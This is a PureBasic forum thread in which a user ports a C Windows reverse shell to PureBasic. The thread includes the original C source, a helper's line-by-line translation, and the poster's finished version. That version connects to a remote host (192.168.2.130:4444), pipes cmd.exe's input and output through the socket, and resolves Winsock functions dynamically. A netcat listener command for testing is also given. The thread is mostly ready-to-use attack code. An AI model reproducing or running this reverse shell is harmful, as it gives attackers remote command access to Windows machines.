[Solved] Redirect IO of process to socket

Just starting out? Need help? Post your questions and find answers here.
Post Reply
xakep
User
User
Posts: 40
Joined: Fri Mar 25, 2016 2:02 pm
Location: Europe

[Solved] Redirect IO of process to socket

Post by xakep »

I basically try to do and cmd.exe reverse shell "via" netcat client.

I try to convert this code cpp code: @ http://sh3llc0d3r.com/windows-reverse-s ... ellcode-i/

Code: Select all

#include "stdafx.h"

#define _WINSOCK_DEPRECATED_NO_WARNINGS

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "Ws2_32.lib")


//int _tmain(int argc, _TCHAR* argv[])
int WinMain(
  _In_ HINSTANCE hInstance,
  _In_ HINSTANCE hPrevInstance,
  _In_ LPSTR     lpCmdLine,
  _In_ int       nCmdShow
)

{

	WSADATA wsaData;
SOCKET s1;
struct sockaddr_in hax;
char ip_addr[16];
STARTUPINFO sui;
PROCESS_INFORMATION pi;

	WSAStartup(MAKEWORD(2, 2), &wsaData);
	s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

	hax.sin_family = AF_INET;
	hax.sin_port = htons(443);
	hax.sin_addr.s_addr = inet_addr("127.0.0.1");

	WSAConnect(s1, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

	memset(&sui, 0, sizeof(sui));
	sui.cb = sizeof(sui);
	sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
	sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE) s1;

	TCHAR commandLine[256] = L"cmd.exe";
	CreateProcess(NULL, commandLine, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
}
What i got for now:

Code: Select all

EnableExplicit

Structure in_addr
  s_addr.l
EndStructure

Structure SOCKADDR_IN_ Align #PB_Structure_AlignC
  sin_family.w
  sin_port.w
  sin_addr.in_addr
  sin_zero.a[8]
EndStructure

Import "WS2_32.LIB"
  WSAConnect(SOCKET.i, *sockaddr, namelen.i, *lpCallerData, *lpCalleeData, *lpSQOS, *lpGQOS)
EndImport

#SD_BOTH = 2
#SOCKET_VERSION_2 = 514
#SOCKET_VERSION_1 = $101

;WS2_32.dll
Global Ws2_32_DLL.l
Global inet_addr.l

Prototype W_inet_addr(*IP)
;WS2_32.dll

Procedure ResolveFunc(lDll.l, lpProcName.s)
  Define ProfileLen, *ProfileNow, lRet.l
  
  If lDll
    ProfileLen = StringByteLength(lpProcName, #PB_Ascii)
    
    If ProfileLen > 2
      *ProfileNow = AllocateMemory(ProfileLen + SizeOf(Character))
      
      If *ProfileNow
        
        If PokeS(*ProfileNow, lpProcName, -1, #PB_Ascii) = ProfileLen
          lRet = GetProcAddress_(lDll, *ProfileNow)
        EndIf
      
        FreeMemory(*ProfileNow)
      EndIf
    EndIf
    
    ProfileLen = 0
    ProcedureReturn lRet
  EndIf
EndProcedure

Procedure Ws2_32_Init()
  
  If Ws2_32_DLL = #False
    Ws2_32_DLL = LoadLibrary_("Ws2_32.dll")
  EndIf
  
  If Ws2_32_DLL <> #False
    
    If inet_addr = #False
      inet_addr = ResolveFunc(Ws2_32_DLL, "inet_addr")
    EndIf
    
    If inet_addr <> #False
      ProcedureReturn #True
    Else
      ProcedureReturn #False
    EndIf
    
  Else
    ProcedureReturn #False
  EndIf
  
EndProcedure

Procedure Ws2_inet_addr(*IP)
  Define Ws2.W_inet_addr
  
  If inet_addr
    Ws2.W_inet_addr = inet_addr
    
    ProcedureReturn Ws2(*IP)
  EndIf
  
EndProcedure

Procedure Go(RemoteIP.s, RemotePort.l)
  Define wData.WSADATA, hSocket.l, sVers.w, hConnect.l, eNow.l, *send, Send.SOCKADDR_IN_, *IP, longIp.l, sui.STARTUPINFO, pi.PROCESS_INFORMATION
  Define h1.l
  
  If Ws2_32_DLL = #False
    If Ws2_32_Init() = #False
      ProcedureReturn
    EndIf
  EndIf

  If WSAStartup_(#SOCKET_VERSION_1, @wData) = #S_OK

    hSocket = WSASocket_(#AF_INET, #SOCK_STREAM, #IPPROTO_TCP, #Null, 0, 0)
    
    If hSocket <> #INVALID_SOCKET
      
      *IP = AllocateMemory(16)
      
      If *IP And PokeS(*IP, RemoteIP, 14, #PB_Ascii) = 14
        
        longIp = Ws2_inet_addr(*IP)
        
        If longIp <> #INADDR_NONE And longIp <> #INADDR_ANY
          Send\sin_family = #AF_INET
          Send\sin_addr\s_addr = longIp
          Send\sin_port = htons_(RemotePort)
          
          hConnect = WSAConnect(hSocket, @Send, SizeOf(SOCKADDR_IN_), #NUL, #NUL, #NUL, #NUL)
          
          If hConnect = #SOCKET_ERROR
            eNow = WSAGetLastError_()
            Debug "eNow:" + eNow
            
            If eNow = #WSAECONNREFUSED Or eNow = #WSAENETUNREACH Or eNow = #WSAETIMEDOUT
              Sleep_(500)
              hConnect = WSAConnect(hSocket, @Send, SizeOf(SOCKADDR), #NUL, #NUL, #NUL, #NUL)
            EndIf
          EndIf
          
          If hConnect = #S_OK
            Debug "hConnect:" + hConnect
            
            ZeroMemory_(@sui, SizeOf(STARTUPINFO))
            sui\cb = SizeOf(sui)
            sui\dwFlags = #STARTF_USESTDHANDLES | #STARTF_USESHOWWINDOW
            
            sui\hStdInput = @hSocket
            sui\hStdOutput = @hSocket
            sui\hStdError = @hSocket
            
            Debug "CreateProcess:" + CreateProcess_(#Null, "cmd.exe", #Null, #Null, #True, 0, #Null, #Null, @sui, @pi)

          EndIf
          
        EndIf
        FreeMemory(*IP)
      EndIf
    
      If hConnect = #S_OK
        shutdown_(hSocket, #SD_BOTH)
      EndIf
      closesocket_(hSocket)
    EndIf
    
    WSACleanup_()
  EndIf
  
EndProcedure

Go("127.0.0.1", 443)
The problem is on this line, i'm not sure how to convert it to purebasic:
sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE) s1;

For test it run netcat like this:
nc -l -p 443 -vv

Any help is appreciated, thanks for reading this topic )
Last edited by xakep on Sat Jul 15, 2017 8:46 pm, edited 1 time in total.
Top
xakep
User
User
Posts: 40
Joined: Fri Mar 25, 2016 2:02 pm
Location: Europe

Re: Redirect IO of process to socket

Post by xakep »

Seems like no one want to help me with this (
Top
User avatar
CELTIC88
Enthusiast
Enthusiast
Posts: 154
Joined: Thu Sep 17, 2015 3:39 pm

Re: Redirect IO of process to socket

Post by CELTIC88 »

Code: Select all

; #include "stdafx.h"
; 
; #define _WINSOCK_DEPRECATED_NO_WARNINGS
; 
; #include <winsock2.h>
; #include <stdio.h>
; 
; #pragma comment(lib,"ws2_32")
 Prototype WSAStartup(wVersionRequested.w,
             *lpWSAData)
 Prototype WSAConnect(SOCKET.i,
             *name,
             namelen.l,
             *lpCallerData,
             *lpCalleeData,
             *lpSQOS,
             *lpGQOS)
 Prototype WSASocket( af.l,
             type.l,
             protocol.l,
             *lpProtocolInfo,
             g.l,;GROUP = DWORD
             dwFlags.l)

OpenLibrary(0,"Ws2_32")
WSAStartup.WSAStartup=GetFunction(0,"WSAStartup")
WSAConnect.WSAConnect=GetFunction(0,"WSAConnect")
WSASocket.WSASocket=GetFunction(0,"WSASocketW")

Import "Ws2_32.lib"
  inet_addr.l(s.p-ascii)
EndImport

Import ""
  memset(p,v.l,size.l)
EndImport


wsaData.WSADATA;WSADATA wsaData;
s1.i;SOCKET s1;
hax.sockaddr_in ;struct sockaddr_in hax;
ip_addr.s{16};char ip_addr[16];
sui.STARTUPINFO ;STARTUPINFO sui;
pi.PROCESS_INFORMATION ;PROCESS_INFORMATION pi;

Macro MAKEWORD(iLo, iHi)
  ((iHi<<8)| (iLo& $FF))
EndMacro

; int _tmain(int argc, _TCHAR* argv[])
; {
WSAStartup(MAKEWORD(2, 2), @wsaData);WSAStartup(MAKEWORD(2, 2), &wsaData);

s1 = WSASocket(#AF_INET, #SOCK_STREAM, #IPPROTO_TCP, #Null,
               #Null, #Null);s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL,unsigned int)NULL, (unsigned int)NULL);

	hax\sin_family = #AF_INET;hax.sin_family = AF_INET;
	hax\sin_port = htons_(4444);hax.sin_port = htons(443);
	hax\sin_addr = inet_addr("192.168.2.130");hax.sin_addr.s_addr = inet_addr("127.0.0.1");

	WSAConnect(s1, @hax, SizeOf(hax), #Null, #Null, #Null, #Null);WSAConnect(s1, (SOCKADDR*)&hax, SizeOf(hax), NULL, NULL, NULL, NULL);

	memset(@sui, 0, SizeOf(sui));memset(&sui, 0, SizeOf(sui));
	sui\cb = SizeOf(sui);sui.cb = SizeOf(sui);
	sui\dwFlags = (#STARTF_USESTDHANDLES | #STARTF_USESHOWWINDOW);sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
	sui\hStdInput =  s1:sui\hStdOutput = s1:sui\hStdError =  s1;sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE) s1;

	 commandLine.s{256} = "cmd.exe";TCHAR commandLine[256] = L"cmd.exe";
	CreateProcess_(#Null, commandLine, #Null, #Null, #True,
	    0, #Null, #Null, @sui, @pi);	CreateProcess(NULL, commandLine, NULL, NULL, TRUE,0, NULL, NULL, &sui, &pi);
; }
interested in Cybersecurity..
Top
xakep
User
User
Posts: 40
Joined: Fri Mar 25, 2016 2:02 pm
Location: Europe

Re: Redirect IO of process to socket

Post by xakep »

@CELTIC88 Thanks for your time and help.

There is "my" final code:

Code: Select all

EnableExplicit

;WS2_32.dll
Global Ws2_32_DLL.l
Global inet_addr.l
Global WSAStartup.l
Global WSAConnect.l
Global WSASocket.l
Global htons.l
Global WSAGetLastError.l

Prototype W_inet_addr(*IP)
Prototype W_WSAStartup(wVersionRequested.w, *lpWSAData)
Prototype W_WSAConnect(SOCKET.i, *name, namelen.l, *lpCallerData, *lpCalleeData, *lpSQOS, *lpGQOS)
Prototype W_WSASocket(af.l, type.l, protocol.l, *lpProtocolInfo, g.l, dwFlags.l)
Prototype W_htons(hostshort.l)
Prototype No_Params()
;WS2_32.dll

#SOCKET_VERSION_2 = 514

Procedure ResolveFunc(lDll.l, lpProcName.s)
  Define ProfileLen, *ProfileNow, lRet.l
 
  If lDll
    ProfileLen = StringByteLength(lpProcName, #PB_Ascii)
   
    If ProfileLen > 2
      *ProfileNow = AllocateMemory(ProfileLen + SizeOf(Character))
     
      If *ProfileNow
       
        If PokeS(*ProfileNow, lpProcName, -1, #PB_Ascii) = ProfileLen
          lRet = GetProcAddress_(lDll, *ProfileNow)
        EndIf
     
        FreeMemory(*ProfileNow)
      EndIf
    EndIf
   
    ProfileLen = 0
    ProcedureReturn lRet
  EndIf
EndProcedure

Procedure Ws2_32_Init()
 
  If Ws2_32_DLL = #False
    Ws2_32_DLL = LoadLibrary_("Ws2_32.dll")
  EndIf
 
  If Ws2_32_DLL <> #False
   
    If inet_addr = #False
      inet_addr = ResolveFunc(Ws2_32_DLL, "inet_addr")
    EndIf
    
    If WSAStartup = #False
      WSAStartup = ResolveFunc(Ws2_32_DLL, "WSAStartup")
    EndIf
    
    If WSAConnect = #False
      WSAConnect = ResolveFunc(Ws2_32_DLL, "WSAConnect")
    EndIf
    
    If WSASocket = #False
      WSASocket = ResolveFunc(Ws2_32_DLL, "WSASocketW")
    EndIf
    
    If htons = #False
      htons = ResolveFunc(Ws2_32_DLL, "htons")
    EndIf
    
    If WSAGetLastError = #False
      WSAGetLastError = ResolveFunc(Ws2_32_DLL, "WSAGetLastError")
    EndIf
    
    If inet_addr <> #False And WSAStartup <> #False And WSAConnect <> #False And WSASocket <> #False And htons <> #False And WSAGetLastError <> #False
      ProcedureReturn #True
    Else
      ProcedureReturn #False
    EndIf
   
  Else
    ProcedureReturn #False
  EndIf
 
EndProcedure

Procedure Ws2_WSAGetLastError()
  Define Ws2.No_Params
  
  If WSAGetLastError
    Ws2.No_Params = WSAGetLastError
    
    ProcedureReturn Ws2()
  EndIf
  
EndProcedure

Procedure Ws2_htons(hostshort.l)
  Define Ws2.W_htons
  
  If htons
    Ws2.W_htons = htons
    
    ProcedureReturn Ws2(hostshort)
  EndIf
  
EndProcedure

Procedure Ws2_WSASocket(af.l, type.l, protocol.l, *lpProtocolInfo, g.l, dwFlags.l)
  Define Ws2.W_WSASocket
  
  If WSASocket
    Ws2.W_WSASocket = WSASocket
    
    ProcedureReturn Ws2(af.l, type.l, protocol.l, *lpProtocolInfo, g.l, dwFlags.l)
  EndIf
  
EndProcedure

Procedure Ws2_WSAConnect(SOCKET.i, *name, namelen.l, *lpCallerData, *lpCalleeData, *lpSQOS, *lpGQOS)
  Define Ws2.W_WSAConnect
  
  If WSAConnect
    Ws2.W_WSAConnect = WSAConnect
    
    ProcedureReturn Ws2(SOCKET, *name, namelen, *lpCallerData, *lpCalleeData, *lpSQOS, *lpGQOS)
  EndIf
  
EndProcedure

Procedure Ws2_WSAStartup(wVersionRequested.i, *lpWSAData)
  Define Ws2.W_WSAStartup
  
  If WSAStartup
    Ws2.W_WSAStartup = WSAStartup
    
    ProcedureReturn Ws2(wVersionRequested, *lpWSAData)
  EndIf
  
EndProcedure

Procedure Ws2_inet_addr(*IP)
  Define Ws2.W_inet_addr
 
  If inet_addr
    Ws2.W_inet_addr = inet_addr
   
    ProcedureReturn Ws2(*IP)
  EndIf
 
EndProcedure

Procedure Go(RemoteIP.s, RemotePort.l)
  Define *IP, longIp.l, wsaData.WSADATA, hSocket.i, hax.sockaddr_in, sui.STARTUPINFO, pi.PROCESS_INFORMATION, commandLine.s{256}, hConnect.l, eNow.l, iLen.l

  If Ws2_32_DLL = #False
    If Ws2_32_Init() = #False
      ProcedureReturn
    EndIf
  EndIf
  
  If Ws2_WSAStartup(#SOCKET_VERSION_2, @wsaData) = #S_OK

    hSocket = Ws2_WSASocket(#AF_INET, #SOCK_STREAM, #IPPROTO_TCP, #Null, #Null, #Null)
    
    If hSocket <> #INVALID_SOCKET
      
      iLen = StringByteLength(RemoteIP, #PB_Ascii)
      *IP = AllocateMemory(iLen + SizeOf(Character))
      
      If *IP And PokeS(*IP, RemoteIP, -1, #PB_Ascii) = iLen
        
        longIp = Ws2_inet_addr(*IP)
        
        If longIp <> #INADDR_NONE And longIp <> #INADDR_ANY
          
          hax\sin_family = #AF_INET
          hax\sin_port = Ws2_htons(RemotePort)
          hax\sin_addr = longIp 
      
          hConnect = Ws2_WSAConnect(hSocket, @hax, SizeOf(hax), #Null, #Null, #Null, #Null)
          
          If hConnect = #SOCKET_ERROR
            eNow = Ws2_WSAGetLastError()
            Debug "eNow:" + eNow
           
            If eNow = #WSAECONNREFUSED Or eNow = #WSAENETUNREACH Or eNow = #WSAETIMEDOUT
              Sleep_(500)
              hConnect = Ws2_WSAConnect(hSocket, @hax, SizeOf(hax), #Null, #Null, #Null, #Null)
            EndIf
          EndIf
          
          If hConnect = #S_OK
            
            ZeroMemory_(@sui, SizeOf(STARTUPINFO))

            sui\cb = SizeOf(sui)
            sui\dwFlags = (#STARTF_USESTDHANDLES | #STARTF_USESHOWWINDOW)
            sui\hStdInput = hSocket:sui\hStdOutput = hSocket:sui\hStdError = hSocket
        
             commandLine = "cmd.exe"
             CreateProcess_(#Null, commandLine, #Null, #Null, #True, 0, #Null, #Null, @sui, @pi)
           EndIf
         EndIf
         FreeMemory(*IP)
       EndIf
    EndIf
  
  EndIf 
EndProcedure


 Go("192.168.2.130", 4444)
Seems like my problem was with this line:

Code: Select all

sui\hStdInput = hSocket:sui\hStdOutput = hSocket:sui\hStdError = hSocket
I haven't know this is possible in purebasic )
Top
Post Reply

Return to “Coding Questions”